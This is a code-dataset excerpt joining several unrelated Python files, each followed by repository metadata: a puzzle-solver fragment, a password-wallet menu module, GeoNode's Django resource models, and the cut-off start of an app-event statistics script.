street.add(self[x + i, y])
else:
return Street(street)
except IndexError:
return Street(street)
return Street(street)
def get_vstreet(self, square):
x = square.x
y = square.y
street = {square}
if y - 1 >= 0 and not self[x, y - 1].is_black:
return None
for i in range(1, 10):
try:
if not self[x, y + i].is_black:
street.add(self[x, y + i])
else:
return Street(street)
except:
return Street(street)
return Street(street)
def get_rest_without_street(self, street):
if street.is_horizontal:
y = street.y
for x in range(9):
if not self[x, y] in street:
yield self[x, y]
else:
x = street.x
for y in range(9):
if not self[x, y] in street:
yield self[x, y]
def remove_street_options_from_rest(self, street):
"""
e.g.: if len(street) == 2 and street_options = {1,2,3}, then
one value in the middle, {2}, can be removed
"""
street_options = street.get_options()
if len(street_options) < 9 and len(street_options) < len(street) * 2:
removables = ("".join(sorted(street_options))[len(street_options) -
len(street):len(street)])
for o in removables:
for s in self.get_rest_without_street(street):
s.remove_option(o)
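# Worked example for the rule documented above: a street of length 2 whose
# combined options are {1, 2, 3} must cover two consecutive values, so every
# possible placement uses the middle value; the slice "123"[3 - 2:2] == "2"
# selects exactly that value, which is then removed from the rest of the
# row/column outside the street.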
def eliminate_possibilities(self):
for square in self:
if square.is_number():
self.eliminate_rowcol(square)
for street in self.streets:
street.eliminate_nonconsec()
self.remove_street_options_from_rest(street)
for square in street:
if square.is_number():
street.eliminate_out_of_range(square)
def eliminate_rowcol(self, square):
v = square.get_value()
for s in self.get_row(square,True):
s.remove_option(v)
for s in self.get_column(square,True):
s.remove_option(v)
def _construct_output(self, show_hints=False):
rowsep = "+-------" * 9 + "+\n"
rowstart = ["| "]*3
output = rowsep
sa = rowstart
for i in range(81):
s = self[i]
placeholder = "\u2588" if s.is_black else " "
if s.is_number():
sa = [sa[r] + placeholder + (s.get_value() if r == 1 else placeholder)
+ placeholder for r in range(3)]
else:
if show_hints and not s.is_black:
o = self[i].get_options()
options = "".join([str(r) if str(r) in o else placeholder for r in range(1, 10)])
sa = [sa[r] + options[3 * r:3 * (r + 1)] for r in range(3)]
else:
sa = [sa[r] + placeholder*3 for r in range(3)]
sa = [sa[r] + " | " for r in range(3)]
if (i+1) % 9 == 0:
output += "\n".join(sa) + "\n"
output += rowsep
sa = rowstart
return output[:-1]
def __str__(self):
return self._construct_output()
def show(self):
print(str(self))
return str(self)
def show_hints(self):
s = self._construct_output(True)
print(s)
return s
def get_total_length(self):
return len("".join(s.get_options() for s in self))
| gpl-3.0 | -2,845,258,074,390,722,000 | 31.945652 | 112 | 0.466678 | false | 3.868539 | false | false | false |
hashtag1138/pass_wallet | menutrousseau.py | 1 | 2983 | from error_handler import MyError, ErrorScreen0
from menu import Menu
import os, time
class Trousseau0(Menu):
def __init__(self, parent):
super().__init__(parent)
self.entrees = None
self.selected = 0
def loadPasswordList(self):
try:
# --- Open ---
conf_file = open('config.txt', 'r')
line = conf_file.readline()
# --- Read ---
while ( "password_directory=" not in line) and len(line)>0: #Lecture
line = conf_file.readline()
# --- Search option ---
if not "password_directory=" in line :
raise MyError("Password_directory not found in config.txt")
# --- Extract path value ---
start = line.find("=") + 1
if start == 0 :
raise MyError(" '=' not found in : " + line)
end = line.find(";")
if end == -1 :
raise MyError(" ';' not found in : " + line)
password_path = line[start:end]
if not os.path.exists(password_path):
raise MyError(password_path + " not found")
pass_list = []
for filename in os.listdir(password_path):
pass_file = open(password_path+'/'+filename, 'r')
content = pass_file.readline()
pass_list.append({'name': filename, 'submenu':
Password(self, titre=filename, encrypted=content)})
return pass_list
except Exception as e:
print(e)
return [{'name' : '0 mot de passe', 'submenu' : ErrorScreen0(self, e)}]
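# Illustrative config.txt line expected by loadPasswordList above
# (the directory shown is a hypothetical example):
#   password_directory=/home/pi/passwords;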
def display(self, key, display):
# --- Loading Passwords ---
if not self.entrees:
self.entrees = self.loadPasswordList()
# --- Rendering ---
self.printList(display, self.selected, self.entrees)
# --- User's Inputs ---
return self.selectMenu(key, display)
class Password(Menu):
def __init__(self, parent, titre=None, encrypted=None):
super().__init__(parent)
self.titre = titre
self.encrypted = encrypted
self.decrypted = None
self.menu_unlock = Unlock0(self)
self.menu_play = Play0(self)
self.menu_modify = Modify0(self)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println(self.titre)
display.println(self.encrypted)
return self
class Unlock0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
display.clear()
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Unlock0")
return self
class Play0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Play0")
return self
class Modify0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Modify0")
return self
| gpl-3.0 | -3,663,898,111,024,548,400 | 22.864 | 74 | 0.610795 | false | 3.117032 | false | false | false |
terranodo/geonode | geonode/base/models.py | 1 | 34374 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import datetime
import math
import os
import logging
from pyproj import transform, Proj
from urlparse import urljoin, urlsplit
from django.db import models
from django.core import serializers
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.db.models import signals
from django.core.files.storage import default_storage as storage
from django.core.files.base import ContentFile
from mptt.models import MPTTModel, TreeForeignKey
from polymorphic.models import PolymorphicModel
from polymorphic.managers import PolymorphicManager
from agon_ratings.models import OverallRating
from geonode.base.enumerations import ALL_LANGUAGES, \
HIERARCHY_LEVELS, UPDATE_FREQUENCIES, \
DEFAULT_SUPPLEMENTAL_INFORMATION, LINK_TYPES
from geonode.utils import bbox_to_wkt
from geonode.utils import forward_mercator
from geonode.security.models import PermissionLevelMixin
from taggit.managers import TaggableManager, _TaggableManager
from taggit.models import TagBase, ItemBase
from treebeard.mp_tree import MP_Node
from geonode.people.enumerations import ROLE_VALUES
logger = logging.getLogger(__name__)
class ContactRole(models.Model):
"""
ContactRole is an intermediate model to bind Profiles as Contacts to Resources and apply roles.
"""
resource = models.ForeignKey('ResourceBase')
contact = models.ForeignKey(settings.AUTH_USER_MODEL)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_('function performed by the responsible '
'party'))
def clean(self):
"""
Make sure there is only one poc and author per resource
"""
if (self.role == self.resource.poc_role) or (self.role == self.resource.metadata_author_role):
contacts = self.resource.contacts.filter(contactrole__role=self.role)
if contacts.count() == 1:
# only allow this if we are updating the same contact
if self.contact != contacts.get():
raise ValidationError('There can be only one %s for a given resource' % self.role)
if self.contact.user is None:
# verify that any unbound contact is only associated to one resource
bounds = ContactRole.objects.filter(contact=self.contact).count()
if bounds > 1:
raise ValidationError('There can be one and only one resource linked to an unbound contact')
elif bounds == 1:
# verify that if there was one already, it corresponds to this instance
if ContactRole.objects.filter(contact=self.contact).get().id != self.id:
raise ValidationError('There can be one and only one resource linked to an unbound contact')
class Meta:
unique_together = (("contact", "resource", "role"),)
class TopicCategory(models.Model):
"""
Metadata about high-level geographic data thematic classification.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_MD_TopicCategoryCode">
"""
identifier = models.CharField(max_length=255, default='location')
description = models.TextField(default='')
gn_description = models.TextField('GeoNode description', default='', null=True)
is_choice = models.BooleanField(default=True)
fa_class = models.CharField(max_length=64, default='fa-times')
def __unicode__(self):
return u"{0}".format(self.gn_description)
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Topic Categories'
class SpatialRepresentationType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_SpatialRepresentationTypeCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.CharField(max_length=255, editable=False)
gn_description = models.CharField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Spatial Representation Types'
class RegionManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Region(MPTTModel):
# objects = RegionManager()
code = models.CharField(max_length=50, unique=True)
name = models.CharField(max_length=255)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children')
def __unicode__(self):
return self.name
class Meta:
ordering = ("name",)
verbose_name_plural = 'Metadata Regions'
class MPTTMeta:
order_insertion_by = ['name']
class RestrictionCodeType(models.Model):
"""
Metadata information about the restriction code type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_RestrictionCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.TextField(max_length=255, editable=False)
gn_description = models.TextField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Restriction Code Types'
class License(models.Model):
identifier = models.CharField(max_length=255, editable=False)
name = models.CharField(max_length=100)
abbreviation = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField(null=True, blank=True)
url = models.URLField(max_length=2000, null=True, blank=True)
license_text = models.TextField(null=True, blank=True)
def __unicode__(self):
return self.name
@property
def name_long(self):
if self.abbreviation is None or len(self.abbreviation) == 0:
return self.name
else:
return self.name+" ("+self.abbreviation+")"
@property
def description_bullets(self):
if self.description is None or len(self.description) == 0:
return ""
else:
bullets = []
lines = self.description.split("\n")
for line in lines:
bullets.append("+ "+line)
return bullets
class Meta:
ordering = ("name", )
verbose_name_plural = 'Licenses'
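# Illustrative example (hypothetical license record): with name set to
# "Creative Commons Attribution" and abbreviation "CC BY", name_long returns
# "Creative Commons Attribution (CC BY)", while description_bullets turns each
# line of the description into a "+ " bullet.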
class HierarchicalKeyword(TagBase, MP_Node):
node_order_by = ['name']
@classmethod
def dump_bulk_tree(cls, parent=None, keep_ids=True):
"""Dumps a tree branch to a python data structure."""
qset = cls._get_serializable_model().get_tree(parent)
ret, lnk = [], {}
for pyobj in qset:
serobj = serializers.serialize('python', [pyobj])[0]
# django's serializer stores the attributes in 'fields'
fields = serobj['fields']
depth = fields['depth']
fields['text'] = fields['name']
fields['href'] = fields['slug']
del fields['name']
del fields['slug']
del fields['path']
del fields['numchild']
del fields['depth']
if 'id' in fields:
# this happens immediately after a load_bulk
del fields['id']
newobj = {}
for field in fields:
newobj[field] = fields[field]
if keep_ids:
newobj['id'] = serobj['pk']
if (not parent and depth == 1) or\
(parent and depth == parent.depth):
ret.append(newobj)
else:
parentobj = pyobj.get_parent()
parentser = lnk[parentobj.pk]
if 'nodes' not in parentser:
parentser['nodes'] = []
parentser['nodes'].append(newobj)
lnk[pyobj.pk] = newobj
return ret
class TaggedContentItem(ItemBase):
content_object = models.ForeignKey('ResourceBase')
tag = models.ForeignKey('HierarchicalKeyword', related_name='keywords')
# see https://github.com/alex/django-taggit/issues/101
@classmethod
def tags_for(cls, model, instance=None):
if instance is not None:
return cls.tag_model().objects.filter(**{
'%s__content_object' % cls.tag_relname(): instance
})
return cls.tag_model().objects.filter(**{
'%s__content_object__isnull' % cls.tag_relname(): False
}).distinct()
class _HierarchicalTagManager(_TaggableManager):
def add(self, *tags):
str_tags = set([
t
for t in tags
if not isinstance(t, self.through.tag_model())
])
tag_objs = set(tags) - str_tags
# If str_tags has 0 elements Django actually optimizes that to not do a
# query. Malcolm is very smart.
existing = self.through.tag_model().objects.filter(
slug__in=str_tags
)
tag_objs.update(existing)
for new_tag in str_tags - set(t.slug for t in existing):
tag_objs.add(HierarchicalKeyword.add_root(name=new_tag))
for tag in tag_objs:
self.through.objects.get_or_create(tag=tag, **self._lookup_kwargs())
class ResourceBaseManager(PolymorphicManager):
def admin_contact(self):
# this assumes there is at least one superuser
superusers = get_user_model().objects.filter(is_superuser=True).order_by('id')
if superusers.count() == 0:
raise RuntimeError('GeoNode needs at least one admin/superuser set')
return superusers[0]
def get_queryset(self):
return super(ResourceBaseManager, self).get_queryset().non_polymorphic()
def polymorphic_queryset(self):
return super(ResourceBaseManager, self).get_queryset()
class ResourceBase(PolymorphicModel, PermissionLevelMixin, ItemBase):
"""
Base Resource Object loosely based on ISO 19115:2003
"""
VALID_DATE_TYPES = [(x.lower(), _(x)) for x in ['Creation', 'Publication', 'Revision']]
date_help_text = _('reference date for the cited resource')
date_type_help_text = _('identification of when a given event occurred')
edition_help_text = _('version of the cited resource')
abstract_help_text = _('brief narrative summary of the content of the resource(s)')
purpose_help_text = _('summary of the intentions with which the resource(s) was developed')
maintenance_frequency_help_text = _('frequency with which modifications and deletions are made to the data after '
'it is first produced')
keywords_help_text = _('commonly used word(s) or formalised word(s) or phrase(s) used to describe the subject '
                           '(space or comma-separated)')
regions_help_text = _('keyword identifies a location')
restriction_code_type_help_text = _('limitation(s) placed upon the access or use of the data.')
constraints_other_help_text = _('other restrictions and legal prerequisites for accessing and using the resource or'
' metadata')
license_help_text = _('license of the dataset')
language_help_text = _('language used within the dataset')
category_help_text = _('high-level geographic data thematic classification to assist in the grouping and search of '
'available geographic data sets.')
spatial_representation_type_help_text = _('method used to represent geographic information in the dataset.')
temporal_extent_start_help_text = _('time period covered by the content of the dataset (start)')
temporal_extent_end_help_text = _('time period covered by the content of the dataset (end)')
data_quality_statement_help_text = _('general explanation of the data producer\'s knowledge about the lineage of a'
' dataset')
# internal fields
uuid = models.CharField(max_length=36)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_resource',
verbose_name=_("Owner"))
contacts = models.ManyToManyField(settings.AUTH_USER_MODEL, through='ContactRole')
title = models.CharField(_('title'), max_length=255, help_text=_('name by which the cited resource is known'))
date = models.DateTimeField(_('date'), default=datetime.datetime.now, help_text=date_help_text)
date_type = models.CharField(_('date type'), max_length=255, choices=VALID_DATE_TYPES, default='publication',
help_text=date_type_help_text)
edition = models.CharField(_('edition'), max_length=255, blank=True, null=True, help_text=edition_help_text)
abstract = models.TextField(_('abstract'), blank=True, help_text=abstract_help_text)
purpose = models.TextField(_('purpose'), null=True, blank=True, help_text=purpose_help_text)
maintenance_frequency = models.CharField(_('maintenance frequency'), max_length=255, choices=UPDATE_FREQUENCIES,
blank=True, null=True, help_text=maintenance_frequency_help_text)
keywords = TaggableManager(_('keywords'), through=TaggedContentItem, blank=True, help_text=keywords_help_text,
manager=_HierarchicalTagManager)
regions = models.ManyToManyField(Region, verbose_name=_('keywords region'), blank=True,
help_text=regions_help_text)
restriction_code_type = models.ForeignKey(RestrictionCodeType, verbose_name=_('restrictions'),
help_text=restriction_code_type_help_text, null=True, blank=True,
limit_choices_to=Q(is_choice=True))
constraints_other = models.TextField(_('restrictions other'), blank=True, null=True,
help_text=constraints_other_help_text)
license = models.ForeignKey(License, null=True, blank=True,
verbose_name=_("License"),
help_text=license_help_text)
language = models.CharField(_('language'), max_length=3, choices=ALL_LANGUAGES, default='eng',
help_text=language_help_text)
category = models.ForeignKey(TopicCategory, null=True, blank=True, limit_choices_to=Q(is_choice=True),
help_text=category_help_text)
spatial_representation_type = models.ForeignKey(SpatialRepresentationType, null=True, blank=True,
limit_choices_to=Q(is_choice=True),
verbose_name=_("spatial representation type"),
help_text=spatial_representation_type_help_text)
# Section 5
temporal_extent_start = models.DateTimeField(_('temporal extent start'), blank=True, null=True,
help_text=temporal_extent_start_help_text)
temporal_extent_end = models.DateTimeField(_('temporal extent end'), blank=True, null=True,
help_text=temporal_extent_end_help_text)
supplemental_information = models.TextField(_('supplemental information'), default=DEFAULT_SUPPLEMENTAL_INFORMATION,
help_text=_('any other descriptive information about the dataset'))
# Section 8
data_quality_statement = models.TextField(_('data quality statement'), blank=True, null=True,
help_text=data_quality_statement_help_text)
# Section 9
# see metadata_author property definition below
# Save bbox values in the database.
# This is useful for spatial searches and for generating thumbnail images and metadata records.
bbox_x0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_x1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
srid = models.CharField(max_length=255, default='EPSG:4326')
# CSW specific fields
csw_typename = models.CharField(_('CSW typename'), max_length=32, default='gmd:MD_Metadata', null=False)
csw_schema = models.CharField(_('CSW schema'),
max_length=64,
default='http://www.isotc211.org/2005/gmd',
null=False)
csw_mdsource = models.CharField(_('CSW source'), max_length=256, default='local', null=False)
csw_insert_date = models.DateTimeField(_('CSW insert date'), auto_now_add=True, null=True)
csw_type = models.CharField(_('CSW type'), max_length=32, default='dataset', null=False, choices=HIERARCHY_LEVELS)
csw_anytext = models.TextField(_('CSW anytext'), null=True, blank=True)
csw_wkt_geometry = models.TextField(_('CSW WKT geometry'),
null=False,
default='POLYGON((-180 -90,-180 90,180 90,180 -90,-180 -90))')
# metadata XML specific fields
metadata_uploaded = models.BooleanField(default=False)
metadata_uploaded_preserve = models.BooleanField(default=False)
metadata_xml = models.TextField(null=True,
default='<gmd:MD_Metadata xmlns:gmd="http://www.isotc211.org/2005/gmd"/>',
blank=True)
popular_count = models.IntegerField(default=0)
share_count = models.IntegerField(default=0)
featured = models.BooleanField(_("Featured"), default=False,
help_text=_('Should this resource be advertised in home page?'))
is_published = models.BooleanField(_("Is Published"), default=True,
help_text=_('Should this resource be published and searchable?'))
# fields necessary for the apis
thumbnail_url = models.TextField(null=True, blank=True)
detail_url = models.CharField(max_length=255, null=True, blank=True)
rating = models.IntegerField(default=0, null=True, blank=True)
def __unicode__(self):
return self.title
@property
def bbox(self):
return [self.bbox_x0, self.bbox_y0, self.bbox_x1, self.bbox_y1, self.srid]
@property
def bbox_string(self):
return ",".join([str(self.bbox_x0), str(self.bbox_y0), str(self.bbox_x1), str(self.bbox_y1)])
@property
def geographic_bounding_box(self):
return bbox_to_wkt(self.bbox_x0, self.bbox_x1, self.bbox_y0, self.bbox_y1, srid=self.srid)
@property
def license_light(self):
a = []
if (not (self.license.name is None)) and (len(self.license.name) > 0):
a.append(self.license.name)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
@property
def license_verbose(self):
a = []
if (not (self.license.name_long is None)) and (len(self.license.name_long) > 0):
a.append(self.license.name_long+":")
if (not (self.license.description is None)) and (len(self.license.description) > 0):
a.append(self.license.description)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
def keyword_list(self):
return [kw.name for kw in self.keywords.all()]
def keyword_slug_list(self):
return [kw.slug for kw in self.keywords.all()]
def region_name_list(self):
return [region.name for region in self.regions.all()]
def spatial_representation_type_string(self):
if hasattr(self.spatial_representation_type, 'identifier'):
return self.spatial_representation_type.identifier
else:
if hasattr(self, 'storeType'):
if self.storeType == 'coverageStore':
return 'grid'
return 'vector'
else:
return None
@property
def keyword_csv(self):
keywords_qs = self.get_real_instance().keywords.all()
if keywords_qs:
return ','.join([kw.name for kw in keywords_qs])
else:
return ''
def set_latlon_bounds(self, box):
"""
Set the four bounds in lat lon projection
"""
self.bbox_x0 = box[0]
self.bbox_x1 = box[1]
self.bbox_y0 = box[2]
self.bbox_y1 = box[3]
def set_bounds_from_center_and_zoom(self, center_x, center_y, zoom):
"""
        Calculate the lat/lon bounds from center coordinates (in mercator) and a zoom level.
"""
self.center_x = center_x
self.center_y = center_y
self.zoom = zoom
deg_len_equator = 40075160 / 360
        # convert center to lat/lon
def get_lon_lat():
wgs84 = Proj(init='epsg:4326')
mercator = Proj(init='epsg:3857')
lon, lat = transform(mercator, wgs84, center_x, center_y)
return lon, lat
# calculate the degree length at this latitude
def deg_len():
lon, lat = get_lon_lat()
return math.cos(lat) * deg_len_equator
lon, lat = get_lon_lat()
# taken from http://wiki.openstreetmap.org/wiki/Zoom_levels
# it might be not precise but enough for the purpose
distance_per_pixel = 40075160 * math.cos(lat)/2**(zoom+8)
# calculate the distance from the center of the map in degrees
# we use the calculated degree length on the x axis and the
        # equatorial degree length on the y axis, assuming it does not change.
        # Assuming a map 1000 px wide and 700 px high:
distance_x_degrees = distance_per_pixel * 500 / deg_len()
distance_y_degrees = distance_per_pixel * 350 / deg_len_equator
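        # Illustrative numbers (added annotation, not in the original source):
        # at zoom 10 on the equator distance_per_pixel is roughly
        # 40075160 / 2**18 ~= 152.9 m, so the 500 px half-width above covers
        # about 76 km east-west.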
self.bbox_x0 = lon - distance_x_degrees
self.bbox_x1 = lon + distance_x_degrees
self.bbox_y0 = lat - distance_y_degrees
self.bbox_y1 = lat + distance_y_degrees
def set_bounds_from_bbox(self, bbox):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.set_latlon_bounds(bbox)
minx, miny, maxx, maxy = [float(c) for c in bbox]
x = (minx + maxx) / 2
y = (miny + maxy) / 2
(center_x, center_y) = forward_mercator((x, y))
xdiff = maxx - minx
ydiff = maxy - miny
zoom = 0
if xdiff > 0 and ydiff > 0:
width_zoom = math.log(360 / xdiff, 2)
height_zoom = math.log(360 / ydiff, 2)
zoom = math.ceil(min(width_zoom, height_zoom))
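            # Illustrative check (added annotation): a bbox spanning 90 degrees
            # on each axis gives 360 / 90 = 4 and log2(4) = 2, so zoom becomes 2.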
self.zoom = zoom
self.center_x = center_x
self.center_y = center_y
def download_links(self):
"""assemble download links for pycsw"""
links = []
for url in self.link_set.all():
if url.link_type == 'metadata': # avoid recursion
continue
if url.link_type == 'html':
links.append((self.title, 'Web address (URL)', 'WWW:LINK-1.0-http--link', url.url))
elif url.link_type in ('OGC:WMS', 'OGC:WFS', 'OGC:WCS'):
links.append((self.title, url.name, url.link_type, url.url))
else:
description = '%s (%s Format)' % (self.title, url.name)
links.append((self.title, description, 'WWW:DOWNLOAD-1.0-http--download', url.url))
return links
def get_tiles_url(self):
"""Return URL for Z/Y/X mapping clients or None if it does not exist.
"""
try:
tiles_link = self.link_set.get(name='Tiles')
except Link.DoesNotExist:
return None
else:
return tiles_link.url
def get_legend(self):
"""Return Link for legend or None if it does not exist.
"""
try:
legends_link = self.link_set.get(name='Legend')
except Link.DoesNotExist:
return None
except Link.MultipleObjectsReturned:
return None
else:
return legends_link
def get_legend_url(self):
"""Return URL for legend or None if it does not exist.
The legend can be either an image (for Geoserver's WMS)
or a JSON object for ArcGIS.
"""
legend = self.get_legend()
if legend is None:
return None
return legend.url
def get_ows_url(self):
"""Return URL for OGC WMS server None if it does not exist.
"""
try:
ows_link = self.link_set.get(name='OGC:WMS')
except Link.DoesNotExist:
return None
else:
return ows_link.url
def get_thumbnail_url(self):
"""Return a thumbnail url.
It could be a local one if it exists, a remote one (WMS GetImage) for example
or a 'Missing Thumbnail' one.
"""
local_thumbnails = self.link_set.filter(name='Thumbnail')
if local_thumbnails.count() > 0:
return local_thumbnails[0].url
remote_thumbnails = self.link_set.filter(name='Remote Thumbnail')
if remote_thumbnails.count() > 0:
return remote_thumbnails[0].url
return staticfiles.static(settings.MISSING_THUMBNAIL)
def has_thumbnail(self):
"""Determine if the thumbnail object exists and an image exists"""
return self.link_set.filter(name='Thumbnail').exists()
def save_thumbnail(self, filename, image):
upload_to = 'thumbs/'
upload_path = os.path.join('thumbs/', filename)
if storage.exists(upload_path):
# Delete if exists otherwise the (FileSystemStorage) implementation
# will create a new file with a unique name
storage.delete(os.path.join(upload_path))
storage.save(upload_path, ContentFile(image))
url_path = os.path.join(settings.MEDIA_URL, upload_to, filename).replace('\\', '/')
url = urljoin(settings.SITEURL, url_path)
Link.objects.get_or_create(resource=self,
url=url,
defaults=dict(
name='Thumbnail',
extension='png',
mime='image/png',
link_type='image',
))
ResourceBase.objects.filter(id=self.id).update(
thumbnail_url=url
)
def set_missing_info(self):
"""Set default permissions and point of contacts.
It is mandatory to call it from descendant classes
but hard to enforce technically via signals or save overriding.
"""
from guardian.models import UserObjectPermission
logger.debug('Checking for permissions.')
        # True if per-user object permissions already exist for this resource.
        has_custom_permissions = UserObjectPermission.objects.filter(
            content_type=ContentType.objects.get_for_model(self.get_self_resource()),
            object_pk=str(self.pk)
        ).exists()
        if not has_custom_permissions:
logger.debug('There are no permissions for this object, setting default perms.')
self.set_default_permissions()
if self.owner:
user = self.owner
else:
user = ResourceBase.objects.admin_contact().user
if self.poc is None:
self.poc = user
if self.metadata_author is None:
self.metadata_author = user
def maintenance_frequency_title(self):
return [v for i, v in enumerate(UPDATE_FREQUENCIES) if v[0] == self.maintenance_frequency][0][1].title()
def language_title(self):
return [v for i, v in enumerate(ALL_LANGUAGES) if v[0] == self.language][0][1].title()
def _set_poc(self, poc):
# reset any poc assignation to this resource
ContactRole.objects.filter(role='pointOfContact', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='pointOfContact', resource=self, contact=poc)
def _get_poc(self):
try:
the_poc = ContactRole.objects.get(role='pointOfContact', resource=self).contact
except ContactRole.DoesNotExist:
the_poc = None
return the_poc
poc = property(_get_poc, _set_poc)
def _set_metadata_author(self, metadata_author):
# reset any metadata_author assignation to this resource
ContactRole.objects.filter(role='author', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='author', resource=self, contact=metadata_author)
def _get_metadata_author(self):
try:
the_ma = ContactRole.objects.get(role='author', resource=self).contact
except ContactRole.DoesNotExist:
the_ma = None
return the_ma
metadata_author = property(_get_metadata_author, _set_metadata_author)
objects = ResourceBaseManager()
class Meta:
# custom permissions,
# add, change and delete are standard in django-guardian
permissions = (
('view_resourcebase', 'Can view resource'),
('change_resourcebase_permissions', 'Can change resource permissions'),
('download_resourcebase', 'Can download resource'),
('publish_resourcebase', 'Can publish resource'),
('change_resourcebase_metadata', 'Can change resource metadata'),
)
class LinkManager(models.Manager):
"""Helper class to access links grouped by type
"""
def data(self):
return self.get_queryset().filter(link_type='data')
def image(self):
return self.get_queryset().filter(link_type='image')
def download(self):
return self.get_queryset().filter(link_type__in=['image', 'data'])
def metadata(self):
return self.get_queryset().filter(link_type='metadata')
def original(self):
return self.get_queryset().filter(link_type='original')
def geogig(self):
return self.get_queryset().filter(name__icontains='geogig')
def ows(self):
return self.get_queryset().filter(link_type__in=['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
class Link(models.Model):
"""Auxiliary model for storing links for resources.
    This helps avoid the need for runtime lookups
    to the OWS server or the CSW Catalogue.
    There are several types of links:
* original: For uploaded files (Shapefiles or GeoTIFFs)
* data: For WFS and WCS links that allow access to raw data
* image: For WMS and TMS links
* metadata: For CSW links
* OGC:WMS: for WMS service links
* OGC:WFS: for WFS service links
* OGC:WCS: for WCS service links
"""
resource = models.ForeignKey(ResourceBase)
extension = models.CharField(max_length=255, help_text=_('For example "kml"'))
link_type = models.CharField(max_length=255, choices=[(x, x) for x in LINK_TYPES])
name = models.CharField(max_length=255, help_text=_('For example "View in Google Earth"'))
mime = models.CharField(max_length=255, help_text=_('For example "text/xml"'))
url = models.TextField(max_length=1000)
objects = LinkManager()
def __str__(self):
return '%s link' % self.link_type
def resourcebase_post_save(instance, *args, **kwargs):
"""
Used to fill any additional fields after the save.
Has to be called by the children
"""
ResourceBase.objects.filter(id=instance.id).update(
thumbnail_url=instance.get_thumbnail_url(),
detail_url=instance.get_absolute_url(),
csw_insert_date=datetime.datetime.now())
instance.set_missing_info()
# we need to remove stale links
for link in instance.link_set.all():
if link.name == "External Document":
if link.resource.doc_url != link.url:
link.delete()
else:
if urlsplit(settings.SITEURL).hostname not in link.url:
link.delete()
def rating_post_save(instance, *args, **kwargs):
"""
Used to fill the average rating field on OverallRating change.
"""
ResourceBase.objects.filter(id=instance.object_id).update(rating=instance.rating)
signals.post_save.connect(rating_post_save, sender=OverallRating)
| gpl-3.0 | 8,784,097,328,487,510,000 | 39.583235 | 120 | 0.616367 | false | 4.100931 | false | false | false |
orkestra-studios/nebuu-service | stats.py | 1 | 2397 | from datetime import date, datetime
from services import *
from collections import defaultdict
import sys
CATEGORIES = ["populerkultur", "yazmevsimi", "kismevsimi", "yesilcam", "emojiler", "gol", "turkdizileri", "evlilik", "para", "kultursanat", "sesinicikar", "ikililer", "okul", "taklit", "osmanli", "markalar", "parti", "neyapiyorum", "ruhhali", "2000ler", "cizgifilm", "hayvanlar", "90lar", "sarkilar", "muzisyenler", "meslekler", "2015geyikleri", "superkahramanlar", "filmler", "diziler", "ankara", "vucudumuzutaniyalim", "yermekan", "mutfak", "istanbul", "sehirler", "2014", "spordunyasi", "oyunlar", "tarih", "futboltakimlari", "bayram", "2013", "teknolojibilgisayar"]
OPEN_KEY = "co.orkestra.nebuu.event.open"
PLAY_KEY = "co.orkestra.nebuu.event.play"
BUY_KEY = "co.orkestra.nebuu.event.buy"
def get_opens(rdb, start,end=None):
OPEN_KEY = "co.orkestra.nebuu.event.open"
start_s = int(datetime.strptime(start, '%d-%m-%Y').strftime('%s'))
end_s = int(datetime.strptime(end, '%d-%m-%Y').strftime('%s')) if end else start_s+86399
dspan = [start_s, end_s]
load = lambda key: map(
json.loads,
